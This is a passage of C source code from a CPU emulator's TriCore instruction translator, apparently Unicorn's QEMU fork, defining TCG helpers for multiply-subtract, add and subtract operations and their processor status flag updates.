rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 r1 = tcg_temp_new_i64(tcg_ctx); TCGv temp = tcg_const_i32(tcg_ctx, n); tcg_gen_concat_i32_i64(tcg_ctx, r1, arg1_low, arg1_high); gen_helper_madd64_q_ssov(tcg_ctx, r1, tcg_ctx->cpu_env, r1, arg2, arg3, temp); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, r1); tcg_temp_free_i64(tcg_ctx, r1); tcg_temp_free(tcg_ctx, temp); } /* ret = r2 - (r1 * r3); */ static inline void gen_msub32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, r1); tcg_gen_ext_i32_i64(tcg_ctx, t2, r2); tcg_gen_ext_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_sub_i64(tcg_ctx, t1, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); /* calc V: result > 0x7fffffff */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t3, t1, 0x7fffffffLL); /* result < -0x80000000 */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t1, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_msubi32_d(DisasContext
*ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msub32_d(ctx, ret, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msub64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, t1, t2, r1, r3); /* only the sub can overflow */ tcg_gen_sub2_tl(tcg_ctx, t3, t4, r2_low, r2_high, t1, t2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, t4, r2_high); tcg_gen_xor_tl(tcg_ctx, t1, r2_high, t2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t1); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, t4); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back the result */ tcg_gen_mov_tl(tcg_ctx, ret_low, t3); tcg_gen_mov_tl(tcg_ctx, ret_high, t4); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); } static inline void gen_msubi64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msub64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubu64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, r1); tcg_gen_concat_i32_i64(tcg_ctx, t2, r2_low, r2_high); tcg_gen_extu_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_sub_i64(tcg_ctx, t3, t2, t1); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, t3); /* calc V bit, only the sub can overflow, if t1 > t2 */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GTU, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_msubui64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubu64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addi_d(DisasContext *ctx, TCGv ret, TCGv r1, target_ulong r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_add_d(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } /* calculate the carry bit too */ static 
inline void gen_add_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, 0); /* Addition and set C/V/SV bits */ tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, r1, t0, r2, t0); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); } static inline void gen_addi_CC(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_add_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addc_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv carry = tcg_temp_new_i32(tcg_ctx); TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, 0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, carry, tcg_ctx->cpu_PSW_C, 0); /* Addition, carry and set C/V/SV bits */ tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, r1, t0, carry, t0); tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, result, tcg_ctx->cpu_PSW_C, r2, t0); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, carry); } static inline void gen_addci_CC(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_addc_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_cond_add(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv result = tcg_temp_new(tcg_ctx); TCGv mask = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_const_i32(tcg_ctx, 0); /* create mask for sticky bits */ tcg_gen_setcond_tl(tcg_ctx, cond, mask, r4, t0); tcg_gen_shli_tl(tcg_ctx, mask, mask, 31); tcg_gen_add_tl(tcg_ctx, result, r1, r2); /* Calc PSW_V */ tcg_gen_xor_tl(tcg_ctx, temp, result, r1); tcg_gen_xor_tl(tcg_ctx, temp2, r1, r2); tcg_gen_andc_tl(tcg_ctx, temp, temp, temp2); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_V, r4, t0, temp, tcg_ctx->cpu_PSW_V); /* Set PSW_SV */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, temp, 
tcg_ctx->cpu_PSW_SV); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, result, result); tcg_gen_xor_tl(tcg_ctx, temp, temp, result); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_AV, r4, t0, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, temp, tcg_ctx->cpu_PSW_SAV); /* write back result */ tcg_gen_movcond_tl(tcg_ctx, cond, r3, r4, t0, result, r1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, mask); } static inline void gen_condi_add(DisasContext *ctx, TCGCond cond, TCGv r1, int32_t r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_cond_add(ctx, cond, r1, temp, r3, r4); tcg_temp_free(tcg_ctx, temp); } static inline void gen_sub_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, result); } static inline void gen_sub64_d(DisasContext *ctx, TCGv_i64 ret, TCGv_i64 r1, TCGv_i64 r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, result, r1, r2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t1, result, r1); tcg_gen_xor_i64(tcg_ctx, t0, r1, r2); tcg_gen_and_i64(tcg_ctx, t1, t1, t0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* calc AV/SAV bits */ tcg_gen_extrh_i64_i32(tcg_ctx, temp, result); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, temp); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_i64(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_sub_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv result = tcg_temp_new(tcg_ctx); TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* calc C bit */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_PSW_C, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, 
tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, temp); } static inline void gen_subc_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, temp, r2); gen_addc_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_cond_sub(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv result = tcg_temp_new(tcg_ctx); TCGv mask = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_const_i32(tcg_ctx, 0); /* create mask for sticky bits */ tcg_gen_setcond_tl(tcg_ctx, cond, mask, r4, t0); tcg_gen_shli_tl(tcg_ctx, mask, mask, 31); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* Calc PSW_V */ tcg_gen_xor_tl(tcg_ctx, temp, result, r1); tcg_gen_xor_tl(tcg_ctx, temp2, r1, r2); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_V, r4, t0, temp, tcg_ctx->cpu_PSW_V); /* Set PSW_SV */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, temp, tcg_ctx->cpu_PSW_SV); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, result, result); tcg_gen_xor_tl(tcg_ctx, temp, temp, result); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_AV, r4, t0, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, temp, tcg_ctx->cpu_PSW_SAV); /* write back result */ tcg_gen_movcond_tl(tcg_ctx, cond, r3, r4, t0, result, r1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, mask); } static inline void gen_msub_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_sub_tl, tcg_gen_sub_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubs_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, 
temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_subs(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_subs(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_sub64_d(ctx, temp64_3, temp64_2, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_msubms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_sub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_msubr64_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_subr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, 
temp, r1, 16); gen_msubr64_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_msubr64s_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_subr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_msubr64s_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_msubr_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_msubr_q(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubrs_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_msubr_q_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msub32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = 